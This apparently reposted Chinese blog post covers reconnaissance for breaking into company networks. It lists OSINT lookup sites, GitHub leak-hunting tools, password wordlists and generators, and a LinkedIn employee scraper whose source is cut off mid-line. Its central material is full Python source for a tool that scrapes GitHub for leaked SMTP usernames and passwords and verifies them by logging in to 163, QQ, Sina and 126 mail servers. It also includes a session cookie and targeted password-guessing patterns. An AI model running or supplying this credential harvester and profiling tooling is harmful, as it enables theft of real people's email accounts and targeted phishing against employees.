内网渗透系列:信息搜集方法小结2
Posted 思源湖的鱼
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网渗透系列:信息搜集方法小结2相关的知识,希望对你有一定的参考价值。
目录
前言
之前已经小结过一些方法:
- 信息搜集方法小结(持续更新):主要是前渗透,即日站或寻找入口时的一些方法
- 内网渗透系列:内网信息搜集方法小结:主要是控制了一台内网机器后,做的一些基础信息搜集
本文与前两者相互补充,主要还是小结下尝试进入内网时(即还是更偏向于前渗透)的一些信息搜集方法
一、开源情报(OSINT)
1、whois/反查/相关资产
- Whois站长之家:http://whois.chinaz.com/
- 微步在线:https://x.threatbook.cn/
- 爱站网ping检测\\IP反查域:https://dns.aizhan.com/
- 阿里云中国万网:https://whois.aliyun.com/
- 全球Whois查询:https://www.whois365.com/cn/
- 站长工具爱站查询:https://whois.aizhan.com/
- Netcraft Site Report显示目标网站使用的技术:
http://toolbar.netcraft.com/site_report?url=
- Robtex DNS查询显示关于目标网站的全面的DNS信息:https://www.robtex.com/
- ICP备案:https://www.beian88.com/
- 工信部备案:http://beian.miit.gov.cn/publish/query/indexFirst.action
- 天眼查:https://www.tianyancha.com/
- http://www.beianbeian.com/
2、github敏感信息
(1)github邮箱密码爬取
爬取github上的邮箱密码,并验证,基于Python2
用法:python Nuggests.py 100 (100为页数最大一百页)
Mail_Modules.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import smtplib
"""支持126,qq,sina,163邮箱"""
def maillogin_163(username,password,url):
smtp_host = "smtp.163.com"
smtp_port = "25"
smtp_user = username
smtp_pass = password
try:
smtp = smtplib.SMTP()
smtp.connect(smtp_host,smtp_port)
smtp.login(smtp_user,smtp_pass)
print 'Analysis :' + url
print 'Loading 163mail Module'
print smtp_user+':'+smtp_pass+' Login OK!'
except Exception:
pass
def maillogin_qq(username,password,url):
smtp_host = "smtp.qq.com"
smtp_port = "25"
smtp_user = username
smtp_pass = password
try:
smtp = smtplib.SMTP()
smtp.connect(smtp_host,smtp_port)
smtp.login(smtp_user,smtp_pass)
print 'Analysis :' + url
print 'Loading qq mail Module'
print smtp_user+':'+smtp_pass+' Login OK!'
except Exception:
pass
def maillogin_sina(username,password,url):
smtp_host = "smtp.sina.com"
smtp_port = "25"
smtp_user = username
smtp_pass = password
try:
smtp = smtplib.SMTP()
smtp.connect(smtp_host,smtp_port)
smtp.login(smtp_user,smtp_pass)
print 'Analysis :' + url
print 'Loading Sina mail Module'
print smtp_user+':'+smtp_pass+' Login OK!'
except Exception:
pass
def maillogin_126(username,password,url):
smtp_host = "smtp.126.com"
smtp_port = "25"
smtp_user = username
smtp_pass = password
try:
smtp = smtplib.SMTP()
smtp.connect(smtp_host,smtp_port)
smtp.login(smtp_user,smtp_pass)
print 'Analysis :' + url
print 'Loading 126 mail Module'
print smtp_user+':'+smtp_pass+' Login OK!'
except Exception:
pass
Nuggests.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests,sys
from bs4 import BeautifulSoup
from Mail_Modules import maillogin_163,maillogin_qq,maillogin_sina,maillogin_126
global urllist
urllist = []
def mailfilter(list,mod):
usern = ''
password =''
for url in list:
try:
page = requests.get(url).content
page = page.split()
for index in range(len(page)):
if 'user' in page[index]:
usern = page[index+2].strip(',').replace("'","")
#print user
if 'pass' in page[index]:
password = page[index+2].strip(',').replace("'","")
#print password
except:
pass
if mod == '163':
maillogin_163(usern,password,url)
if mod == 'qq':
maillogin_qq(usern,password,url)
if mod == 'sina':
maillogin_sina(usern,password,url)
if mod == '126':
maillogin_126(usern,password,url)
def read_page(keyword,pages):
pages = int(pages)
print 'Search Keyword : '+keyword
print 'Scanning '+str(pages)+' pages from Github!'
for page in range(pages):
headers = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/49.0.2623.75 Safari/537.36 115Browser/7.2.5'
cookie = {"Cookie":"_octo=GH1.1.1911767667.1480641870; logged_in=yes; dotcom_user=menu88; _ga=GA1.2.1291948085.1480641870; tz=Asia%2FShanghai; _gh_sess=eyJzZXNzaW9uX2lkIjoiNWY4YTVkMTk3YzRhNzg3ZWEwYjM5OWUwZWNhNDY2ZWIiLCJjb250ZXh0IjoiLyIsInNweV9yZXBvIjoibWVudTg4L215cHVibGljIiwic3B5X3JlcG9fYXQiOjE0ODEyNDY5NDN9--170066295059ff1fc3d8b46b50d3c62847ac82eb; user_session=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX; __Host-user_session_same_site=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX"} #cookie换成自己github的
url = 'https://github.com/search?l=php&p='+str(page)+'&q='+keyword+'&type=Code&utf8=%E2%9C%93'
print '正在抓取第'+str(page)+'页!'
pagecon = requests.get(url,cookies = cookie).content
soup = BeautifulSoup(pagecon,"html.parser")
for link in soup.find_all('a'):
url = link.get('href')
if 'blob' in url:
url = url.split('#')[0]
url = url.split('blob/')[0]+url.split('blob/')[1]
urllist.append('https://raw.githubusercontent.com'+url)
pages = 5
#pages = sys.argv[1]
read_page('smtp+163.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'163')
urllist =[]
read_page('smtp+qq.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'qq')
urllist =[]
read_page('smtp+sina.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'sina')
urllist =[]
read_page('smtp+126.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'126')
(2)GSIL
止介大佬写的:https://github.com/FeeiCN/GSIL
近实时(15min)监控GitHub敏感信息泄露,并发送告警通知,基于Python3
(3)x-patrol
小米安全的:https://github.com/MiSecurity/x-patrol
比起前两个更完善,基于Go
3、google hacking
可参见:Google Hack 方法小结
二、企业密码字典
1、字典列表
github上的一些字典:
- https://github.com/lavalamp-/password-lists
- https://github.com/rootphantomer/Blasting_dictionary
- https://github.com/k8gege/PasswordDic
针对特定的厂商
['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']
2、密码生成
(1)genpAss
中国特色的弱口令生成器,可以根据个人信息生成弱口令
原作者删掉了,https://github.com/test98123456/genpAss
(2)passmaker
https://github.com/bit4woo/passmaker
根据定制的规则来组合生成出密码字典,主要目标是针对企业,基于Python2
(3)pydictor
https://github.com/LandGrey/pydictor
可以生成各种字典,功能强大
三、从公共数据源获取信息
1、Link
https://github.com/mdsecactivebreach/LinkedInt
用法:
Providing you with Linkedin Intelligence
Author: Vincent Yiu (@vysec, @vysecurity)
Original version by @DisK0nn3cT
[*] Enter search Keywords (use quotes for more percise results)
"General Motors"
[*] Enter filename for output (exclude file extension)
generalmotors
[*] Filter by Company? (Y/N):
Y
[*] Specify a Company ID (Provide ID or leave blank to automate):
[*] Enter e-mail domain suffix (eg. contoso.com):
gm.com
[*] Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast):
auto
[*] Automaticly using Hunter IO to determine best Prefix
[!] {first}.{last}
[+] Found first.last prefix
源码:
# LinkedInt
# Scrapes LinkedIn without using LinkedIn API
# Original scraper by @DisK0nn3cT (https://github.com/DisK0nn3cT/linkedin-gatherer)
# Modified by @vysecurity
# - Additions:
# --- UI Updates
# --- Constrain to company filters
# --- Addition of Hunter for e-mail prediction
#!/usr/bin/python
import socket
import sys
import re
import time
import requests
import subprocess
import json
import argparse
import smtplib
import dns.resolver
import cookielib
import os
import urllib
import math
import urllib2
import string
from bs4 import BeautifulSoup
from thready import threaded
reload(sys)
sys.setdefaultencoding('utf-8')
""" Setup Argument Parameters """
parser = argparse.ArgumentParser(description='Discovery LinkedIn')
parser.add_argument('-u', '--keywords', help='Keywords to search')
parser.add_argument('-o', '--output', help='Output file (do not include extentions)')
args = parser.parse_args()
api_key = "" # Hunter API key
username = "" # enter username here
password = "" # enter password here
if api_key == "" or username == "" or password == "":
print "[!] Oops, you did not enter your api_key, username, or password in LinkedInt.py"
sys.exit(0)
def login():
cookie_filename = "cookies.txt"
cookiejar = cookielib.MozillaCookieJar(cookie_filename)
opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),urllib2.HTTPHandler(debuglevel=0),urllib2.HTTPSHandler(debuglevel=0),urllib2.HTTPCookieProcessor(cookiejar))
page = loadPage(opener, "https://www.linkedin.com/")
parse = BeautifulSoup(page, "html.parser")
csrf = parse.find(id="loginCsrfParam-login")['value']
login_data = urllib.urlencode({'session_key': username, 'session_password': password, 'loginCsrfParam': csrf})
page = loadPage(opener,"https://www.linkedin.com/uas/login-submit", login_data)
parse = BeautifulSoup(page, "html.parser")
cookie = ""
try:
cookie = cookiejar._cookies['.www.linkedin.com']['/']['li_at'].value
except:
sys.exit(0)
cookiejar.save()
os.remove(cookie_filename)
return cookie
def loadPage(client, url, data=None):
try:
response = client.open(url)
except:
print "[!] Cannot load main LinkedIn page"
try:
if data is not None:
response = client.open(url, data)
else:
response = client.open(url)
return ''.join(response.readlines())
except:
sys.exit(0)
def get_search():
body = ""
csv = []
css = """<style>
#employees {
font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
border-collapse: collapse;
width: 100%;
}
#employees td, #employees th {
border: 1px solid #ddd;
padding: 8px;
}
#employees tr:nth-child(even){background-color: #f2f2f2;}
#employees tr:hover {background-color: #ddd;}
#employees th {
padding-top: 12px;
padding-bottom: 12px;
text-align: left;
background-color: #4CAF50;
color: white;
}
</style>
"""
header = """<center><table id=\\"employees\\">
<tr>
<th>Photo</th>
<th>Name</th>
<th>Possible Email:</th>
<th>Job</th>
<th>Location</th>
</tr>
"""
# Do we want to automatically get the company ID?
if bCompany:
if bAuto:
# Automatic
# Grab from the URL
companyID = 0
url = "https://www.linkedin.com/voyager/api/typeahead/hits?q=blended&query=%s" % search
headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
cookies['JSESSIONID'] = 'ajax:0397788525211216808'
r = requests.get(url, cookies=cookies, headers=headers)
content = json.loads(r.text)
firstID = 0
for i in range(0,len(content['elements'])):
try:
companyID = content['elements'][i]['hitInfo']['com.linkedin.voyager.typeahead.TypeaheadCompany']['id']
if firstID == 0:
firstID = companyID
print "[Notice] Found company ID: %s" % companyID
except:
continue
companyID = firstID
if companyID == 0:
print "[WARNING] No valid company ID found in auto, please restart and find your own"
else:
# Don't auto, use the specified ID
companyID = bSpecific
print
print "[*] Using company ID: %s" % companyID
# Fetch the initial page to get results/page counts
if bCompany == False:
url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=0" % search
else:
url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=0" % (companyID)
print url
headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
cookies['JSESSIONID'] = 'ajax:0397788525211216808'
#print url
r = requests.get(url, cookies=cookies, headers=headers)
content = json.loads(r.text)
data_total = content['elements'][0]['total']
# Calculate pages off final results at 40 results/page
pages = data_total / 40
if pages == 0:
pages = 1
if data_total % 40 == 0:
# Becuase we count 0... Subtract a page if there are no left over results on the last page
pages = pages - 1
if pages == 0:
print "[!] Try to use quotes in the search name"
sys.exit(0)
print "[*] %i Results Found" % data_total
if data_total > 1000:
pages = 25
print "[*] LinkedIn only allows 1000 results. Refine keywords to capture all data"
print "[*] Fetching %i Pages" % pages
print
for p in range(pages):
# Request results for each page using the start offset
if bCompany == False:
url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=%i" % (search, p*40)
else:
url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=%i" % (companyID, p*40)
#print url
r = requests.get(url, cookies=cookies, headers=headers)
content = r.text.encode('UTF-8')
content = json.loads(content)
print "[*] Fetching page %i with %i results" % ((p),len(content['elements'][0]['elements']))
for c in content['elements'][0]['elements']:
if 'com.linkedin.voyager.search.SearchProfile' in c['hitInfo'] and c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['headless'] == False:
try:
data_industry = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['industry']
except:
data_industry = ""
data_firstname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['firstName']
data_lastname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['lastName']
data_slug = "https://www.linkedin.com/in/%s" % c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['publicIdentifier']
data_occupation = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['occupation']
data_location 以上是关于内网渗透系列:信息搜集方法小结2的主要内容,如果未能解决你的问题,请参考以下文章